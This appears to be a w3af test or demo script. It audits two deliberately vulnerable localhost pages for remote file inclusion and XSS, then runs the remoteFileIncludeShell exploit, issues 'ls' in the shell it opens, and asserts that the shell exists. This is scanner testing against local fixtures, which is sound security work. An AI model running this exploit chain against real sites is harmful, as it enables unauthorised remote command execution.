# This is the remoteFileInclude demo:

plugins
audit remoteFileInclude, xss
audit config remoteFileInclude
set listenAddress 127.0.0.1
set usew3afSite False
back

output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
back

target
set target http://localhost/w3af/audit/remoteFileInclusion/vulnerable.php?file=f0as9 , http://localhost/w3af/audit/xss/simple_xss_no_script_2.php?text=1
back

start

assert len( kb.kb.getData('remoteFileInclude', 'remoteFileInclude') ) == 1

exploit
exploit config remoteFileIncludeShell
set useXssBug True
back

exploit remoteFileIncludeShell
interact 0
ls
endInteraction

assert len( kb.kb.getData('remoteFileIncludeShell', 'shell') ) == 1

exit